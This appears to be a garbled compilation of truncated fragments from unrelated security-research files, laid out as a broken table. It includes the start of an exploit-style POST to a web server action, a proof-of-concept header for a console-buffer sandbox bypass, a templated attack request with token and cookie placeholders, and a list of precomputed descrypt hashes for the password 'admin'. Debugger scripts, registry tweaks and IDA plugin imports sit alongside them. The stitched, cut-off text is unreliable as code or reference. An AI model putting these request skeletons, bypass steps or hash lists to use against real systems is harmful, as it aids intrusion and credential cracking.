| POST / HTTP/1.1 | |
| Host: localhost | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36 | |
| Next-Action: x | |
| Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad | |
| Content-Length: 459 | |
| ------WebKitFormBoundaryx8jO2oVc6SWP3Sad | |
| Content-Disposition: form-data; name="0" |
| "use strict"; | |
| // This script implements the !dump_vmcs command that displays values of the all | |
| // fields in the current VMCS. The processor must be in VMX-root operation with | |
| // an active VMCS. | |
| // | |
| // As a reference, there are some other implementations of the same concept. The | |
| // author is now aware of those two at least. Check them out as it may fit your | |
| // need better. | |
| // - https://github.com/ergot86/crap/blob/main/hyperv_stuff.js (Windbg JavaScript) |
| #define UNICODE | |
| #define _UNICODE | |
| #include <iostream> | |
| #include <string> | |
| #include <Windows.h> | |
| #include <Psapi.h> | |
| #include <fstream> | |
| #pragma comment(lib, "ntdll.lib") | |
| #pragma comment(lib, "Psapi") |
| /* | |
| MiniPoc for console buffer security bypass | |
| Instructions | |
| - Compile with x64 Native Tools Command Prompt for VS 2019 | |
| * cl /Zi /std:c++latest minipoc.cpp | |
| - Copy executable and apply Low Integrity directly to the file | |
| * copy minipoc.exe minipoclow.exe | |
| * icacls minipoclow.exe /setintegritylevel Low | |
| (/Zi for pdb generation) |
| POST /api/Action/TestAction HTTP/1.1 | |
| Host: <target> | |
| Content-Length: 3978 | |
| Accept: application/json, text/javascript, */*; q=0.01 | |
| X-XSRF-TOKEN: <token> | |
| X-Requested-With: XMLHttpRequest | |
| ViewLimitationID: 0 | |
| User-Agent: Mozilla/5.0 | |
| Content-Type: application/json; charset=UTF-8 | |
| Cookie: <cookie> |
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization\NoLockScreen DWORD=1
New-Item -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\Personalization
New-ItemProperty -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\Personalization -Name NoLockScreen -PropertyType DWord -Value 1
| # All possible descrypt hashes of the password 'admin', using all possible salts. | |
| # From https://github.com/roycewilliams/kens-salty-rainbow | |
| # If you find a device that always uses one of these, let me know. | |
| ..xpoEyRReGzk | |
| ./nlIXYriZaB2 | |
| .08iPeaCLti3E | |
| .1fH80ykoJAyI | |
| .23PstrXfk7Nw | |
| .37vRhjo4ZP66 | |
| .4nTonCOGSWyU |
| #!/bin/bash | |
| # quick and dirty bash script to extract .gnu_debugdata section | |
| # from ELF binaries to generate an IDC script that adds these | |
| # names as symbols | |
| # --rpw, 2020-06-21 | |
| SYMBOLFILE=debugdata_symbols.elf | |
| if [ $# -lt 1 ]; then | |
| echo "you need to supply a path to a binary" |
| from ctypes import c_ssize_t, c_void_p, c_int, c_void_p, create_string_buffer, cast, WINFUNCTYPE, CFUNCTYPE, windll, cdll, CDLL | |
| from PyQt5.QtCore import Qt, QTimer, QObject | |
| from PyQt5.QtGui import QResizeEvent, QFocusEvent | |
| from PyQt5.QtWidgets import QWidget, QDialog, QDialogButtonBox, QPushButton, qApp | |
| import os | |
| import sys | |
| import idaapi | |
| import idc |
